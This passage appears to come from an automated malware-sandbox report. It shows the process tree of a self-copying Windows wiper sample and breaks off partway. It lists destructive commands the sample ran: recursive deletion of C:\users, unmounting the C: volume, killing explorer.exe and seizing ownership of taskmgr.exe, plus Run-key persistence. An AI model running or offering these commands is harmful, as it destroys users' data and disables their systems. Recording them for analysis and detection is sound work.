        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /KillHardDisk 1698005182
        10⤵
        
        PID:11948
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /KillHardDisk 1698005182
        11⤵
        
        PID:13496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:14868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:16092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killMBR 1698005182
        10⤵
        
        PID:13208
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killMBR 1698005182
        11⤵
        
        PID:3104
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:9072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killwindows 1698005182
        10⤵
        
        PID:15704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+08298.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        8⤵
        
        PID:7076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+728290.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        8⤵
        
        PID:5184
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        9⤵
        Kills process with taskkill
        
        PID:8528
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
        8⤵
        
        PID:8736
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
        9⤵
        
        PID:9752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:9852
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:6580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /autoup 1698005182
        10⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /autoup 1698005182
        11⤵
        
        PID:11120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /killwindows 1698005182
        10⤵
        
        PID:11612
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /killwindows 1698005182
        11⤵
        
        PID:5872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:14488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /KillHardDisk 1698005182
        10⤵
        
        PID:14284
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /KillHardDisk 1698005182
        11⤵
        
        PID:4120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /killMBR 1698005182
        10⤵
        
        PID:16108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /autoup 1698005182
        10⤵
        
        PID:10860
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:5604
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+08298.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        8⤵
        
        PID:7628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe 1698005182
        8⤵
        
        PID:6256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+728290.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        8⤵
        
        PID:5416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
        8⤵
        
        PID:7644
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
        9⤵
        
        PID:9720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:8716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:4928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        6⤵
        
        PID:5056
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        6⤵
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:7052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6508
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:7924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /autoup 1698005182
        6⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /autoup 1698005182
        7⤵
        Adds Run key to start application
        
        PID:9196
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killwindows 1698005182
        6⤵
        
        PID:9564
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killwindows 1698005182
        7⤵
        
        PID:6328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:11200
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:11776
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /KillHardDisk 1698005182
        6⤵
        
        PID:10848
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /KillHardDisk 1698005182
        7⤵
        
        PID:7028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:13184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:15444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:14144
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killMBR 1698005182
        6⤵
        
        PID:12448
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killMBR 1698005182
        7⤵
        
        PID:14848
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:10872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1144
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
    3⤵
    PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    PID:4048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+829858.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
      4⤵
      PID:3728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe 1698005182
      4⤵
      PID:2748
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:4996
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe+024005.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        8⤵
        
        PID:5812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
        8⤵
        
        PID:9592
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
        9⤵
        
        PID:3336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:5980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:6268
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:5184
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
        6⤵
        Executes dropped EXE
        
        PID:6244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /autoup 1698005182
        7⤵
        
        PID:10228
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /autoup 1698005182
        8⤵
        
        PID:6880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killwindows 1698005182
        7⤵
        
        PID:5524
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killwindows 1698005182
        8⤵
        
        PID:10888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /KillHardDisk 1698005182
        7⤵
        
        PID:11368
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /KillHardDisk 1698005182
        8⤵
        
        PID:10800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        9⤵
        
        PID:2652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        9⤵
        
        PID:1340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killMBR 1698005182
        7⤵
        
        PID:14128
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killMBR 1698005182
        8⤵
        
        PID:15472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /protect 1698005182
        7⤵
        
        PID:16372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /autoup 1698005182
        6⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /autoup 1698005182
        7⤵
        Adds Run key to start application
        
        PID:7664
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killwindows 1698005182
        6⤵
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killwindows 1698005182
        7⤵
        
        PID:10320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:8800
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:12896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        8⤵
        
        PID:16072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /KillHardDisk 1698005182
        6⤵
        
        PID:11112
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /KillHardDisk 1698005182
        7⤵
        
        PID:12412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killMBR 1698005182
        6⤵
        
        PID:10956
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /killMBR 1698005182
        7⤵
        
        PID:14544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        6⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /protect 1698005182
        7⤵
        
        PID:16176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe 1698005182
      4⤵
      PID:4928
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:5288
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /protect 1698005182
        6⤵
        
        PID:5776
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:6260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:8544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /save 1698005182
        6⤵
        
        PID:6236
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /autoup 1698005182
        6⤵
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /autoup 1698005182
        7⤵
        Adds Run key to start application
        
        PID:6608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Executes dropped EXE
        
        PID:6420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /killwindows 1698005182
        6⤵
        
        PID:9412
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /killwindows 1698005182
        7⤵
        
        PID:10124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        8⤵
        
        PID:10716
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        9⤵
        Modifies file permissions
        
        PID:12420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /KillHardDisk 1698005182
        6⤵
        
        PID:10568
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /KillHardDisk 1698005182
        7⤵
        
        PID:12044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        8⤵
        
        PID:14512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        8⤵
        
        PID:13964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /killMBR 1698005182
        6⤵
        
        PID:12676
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /killMBR 1698005182
        7⤵
        
        PID:1100
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /protect 1698005182
        6⤵
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /protect 1698005182
        7⤵
        
        PID:12376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+35725.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
      4⤵
      PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
  2⤵
  PID:5056
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /save 1698005182
    3⤵
    PID:4208
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
    3⤵
    - Executes dropped EXE
    PID:5428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  PID:4408
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+17838.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
      4⤵
      PID:2128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe 1698005182
      4⤵
      PID:4432
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe 1698005182
        5⤵
        Executes dropped EXE
        
        PID:1360
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /save 1698005182
        6⤵
        
        PID:6332
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /save 1698005182
        7⤵
        Executes dropped EXE
        
        PID:5320
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe /protect 1698005182
        8⤵
        Executes dropped EXE
        
        PID:5608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe 1698005182
        9⤵
        
        PID:8608
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe 1698005182
        10⤵
        
        PID:9820
        
        C:\Windows\system32\cmd.exe
        
